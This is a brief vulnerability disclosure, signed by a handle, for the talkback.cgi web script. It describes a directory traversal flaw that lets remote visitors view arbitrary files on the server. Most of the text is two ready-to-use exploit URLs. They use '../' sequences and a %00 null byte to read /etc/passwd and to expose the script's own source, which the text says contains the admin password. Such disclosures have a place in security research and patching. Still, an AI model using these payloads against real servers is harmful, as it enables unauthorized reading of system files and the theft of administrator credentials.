Name   : talkback (CGI): "show files" vulnurability.
Problem: Talkback.cgi may allow remote users (website visitors) to
         view any file on a webserver (depending on the user the
         webserver is running on).

Exploit:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../../../../../../../../etc/passwd%00&action=view&matchview=1

This will display the /etc/passwd (if the webserver user has
access to this file).

Another URL can display the source of talkback.cgi itself
that contains the admin password:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../cgi-bin/talkback.cgi%00&action=view&matchview=1

(You might have to use another URL instead of 
../cgi-bin/talkback.cgi%00, this depends on where the 
cgi-bin is installed)

                by: Stan a.k.a. ThePike (stan@whizkunde.org)